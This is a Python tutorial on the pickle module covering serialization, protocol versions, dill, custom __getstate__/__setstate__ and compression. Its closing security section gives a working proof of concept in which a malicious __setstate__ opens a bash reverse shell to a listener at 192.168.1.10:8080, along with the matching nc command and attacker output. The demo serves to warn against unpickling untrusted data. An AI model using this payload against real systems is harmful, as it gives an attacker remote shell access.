The Python pickle Module: How to Persist Objects in Python

The Python pickle Module: How to Persist Objects in Python

by Davide Mastromatteo Apr 27, 2020 intermediate python

As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle module.

In this tutorial, you’ll learn:

  • What it means to serialize and deserialize an object
  • Which modules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Python pickle module
  • How to use the Python pickle module to serialize object hierarchies
  • What the risks are when deserializing an object from an untrusted source

Let’s get pickling!

Serialization in Python

The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.

In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.

Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.

Python offers three different modules in the standard library that allow you to serialize and deserialize objects:

  1. The marshal module
  2. The json module
  3. The pickle module

In addition, Python supports XML, which you can also use to serialize objects.

The marshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc files you get when the interpreter imports a Python module. So, even though you can use marshal to serialize some of your objects, it’s not recommended.

The json module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.

There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json module, you can serialize and deserialize several standard Python types:

The Python pickle module is another way to serialize and deserialize objects in Python. It differs from the json module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.

So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.

Here are three general guidelines for deciding which approach to use:

  1. Don’t use the marshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.

  2. The json module and XML are good choices if you need interoperability with different languages or a human-readable format.

  3. The Python pickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with pickle.

Inside the Python pickle Module

The Python pickle module basically consists of four methods:

  1. pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
  2. pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
  3. pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
  4. pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)

The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between dump() and dumps() is that the first creates a file containing the serialization result, whereas the second returns a string.

To differentiate dumps() from dump(), it’s helpful to remember that the s at the end of the function name stands for string. The same concept also applies to load() and loads(): The first one reads a file to start the unpickling process, and the second one operates on a string.

Consider the following example. Say you have a custom-defined class named example_class with several different attributes, each of a different type:

  • a_number
  • a_string
  • a_dictionary
  • a_list
  • a_tuple

The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class:

# pickling.py
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(
    f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")

In the example above, you create several different objects and serialize them with pickle. This produces a single string with the serialized result:

$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'

This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}

The pickling process ends correctly, storing your entire instance in this string: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.' After the pickling process ends, you modify your original object by setting the attribute a_dict to None.

Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began.

Protocol Formats of the Python pickle Module

As mentioned above, the pickle module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle module has evolved over time.

This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.

There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.

  1. Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
  2. Protocol version 1 was the first binary format.
  3. Protocol version 2 was introduced in Python 2.3.
  4. Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
  5. Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
  6. Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.

To choose a specific protocol, you need to specify the protocol version when you invoke load(), loads(), dump() or dumps(). If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL attribute.

Picklable and Unpicklable Types

You’ve already learned that the Python pickle module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.

If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill.

The dill module extends the capabilities of pickle. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.

To test this module, you can try to pickle a lambda function:

# pickling_error.py
import pickle

square = lambda x : x * x
my_pickle = pickle.dumps(square)

If you try to run this program, then you will get an exception because the Python pickle module can’t serialize a lambda function:

$ python pickling_error.py
Traceback (most recent call last):
  File "pickling_error.py", line 6, in <module>
    my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed

Now try replacing the Python pickle module with dill to see if there’s any difference:

# pickling_dill.py
import dill

square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)

If you run this code, then you’ll see that the dill module serializes the lambda without returning an error:

$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'

Another interesting feature of dill is that it can even serialize an entire interpreter session. Here’s an example:

>>>
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()

In this example, you start the interpreter, import a module, and define a lambda function along with a couple of other variables. You then import the dill module and invoke dump_session() to serialize the entire session.

If everything goes okay, then you should get a test.pkl file in your current directory:

$ ls test.pkl
4 -rw-r--r--@ 1 dave  staff  439 Feb  3 10:52 test.pkl

Now you can start a new instance of the interpreter and load the test.pkl file to restore your last session:

>>>
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>

The first globals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill module and call load_session() to restore your serialized interpreter session.

Even though dill lets you serialize a wider range of objects than pickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill.

So, how can you solve this problem?

The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.

You can use __getstate__() to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__(), then the default instance’s __dict__ will be used.

In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate()__:

# custom_pickling.py

import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)

In this example, you create an object with three attributes. Since one attribute is a lambda, the object is unpicklable with the standard pickle module.

To address this issue, you specify what to pickle with __getstate__(). You first clone the entire __dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c attribute.

If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c attribute:

$ python custom_pickling.py
{'a': 35, 'b': 'test'}

But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c object back to the deserialized instance? You can accomplish this with __setstate__():

# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)

By passing the excluded c object to __setstate__(), you ensure that it appears in the __dict__ of the unpickled string.

Compression of Pickled Objects

Although the pickle data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with bzip2 or gzip.

To compress a pickled string with bzip2, you can use the bz2 module provided in the standard library.

In the following example, you’ll take a string, pickle it, and then compress it using the bz2 library:

>>>
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259

When using compression, bear in mind that smaller files come at the cost of a slower process.

Security Concerns With the Python pickle Module

You now know how to use the pickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.

However, there’s one more thing you need to know about the Python pickle module: It’s not secure. Do you remember the discussion of __setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!

So, what can you do to reduce this risk?

Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac to sign the data and ensure it hasn’t been tampered with.

The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:

# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c
                  "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')


my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)

In this example, the unpickling process executes __setstate__(), which executes a Bash command to open a remote shell to the 192.168.1.10 machine on port 8080.

Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc command to listen for a connection to port 8080:

$ nc -l 8080

This will be the attacker terminal. If everything works, then the command will seem to hang.

Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10.

By executing this code, the victim will expose a shell to the attacker:

$ python remote.py

If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:

$ nc -l 8080
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

So, let me repeat this critical point once again: Do not use the pickle module to deserialize objects from untrusted sources!

Conclusion

You now know how to use the Python pickle module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.

In this tutorial, you’ve learned:

  • What it means to serialize and deserialize an object
  • Which modules you can use to serialize objects in Python
  • Which kinds of objects can be serialized with the Python pickle module
  • How to use the Python pickle module to serialize object hierarchies
  • What the risks are of unpickling from an untrusted source

With this knowledge, you’re well equipped to persist your objects using the Python pickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.

If you have any questions, then leave a comment down below or contact me on Twitter!

🐍 Python Tricks 💌

Get a short & sweet Python Trick delivered to your inbox every couple of days. No spam ever. Unsubscribe any time. Curated by the Real Python team.

Python Tricks Dictionary Merge

About Davide Mastromatteo

Davide Mastromatteo Davide Mastromatteo

Developer and editor of “the Python Corner". Blood donor, Apple user, Python and Swift addicted. NFL, Rugby and Chess lover. Constantly hungry and foolish.

» More about Davide

Each tutorial at Real Python is created by a team of developers so that it meets our high quality standards. The team members who worked on this tutorial are:

Master Real-World Python Skills With Unlimited Access to Real Python

Join us and get access to hundreds of tutorials, hands-on video courses, and a community of expert Pythonistas:

Level Up Your Python Skills »

Master Real-World Python Skills
With Unlimited Access to Real Python

Join us and get access to hundreds of tutorials, hands-on video courses, and a community of expert Pythonistas:

Level Up Your Python Skills »

What Do You Think?

Real Python Comment Policy: The most useful comments are those written with the goal of learning from or helping out other readers—after reading the whole article and all the earlier comments. Complaints and insults generally won’t make the cut here.

What’s your #1 takeaway or favorite thing you learned? How are you going to put your newfound skills to use? Leave a comment below and let us know.

Keep Learning

Related Tutorial Categories: intermediate python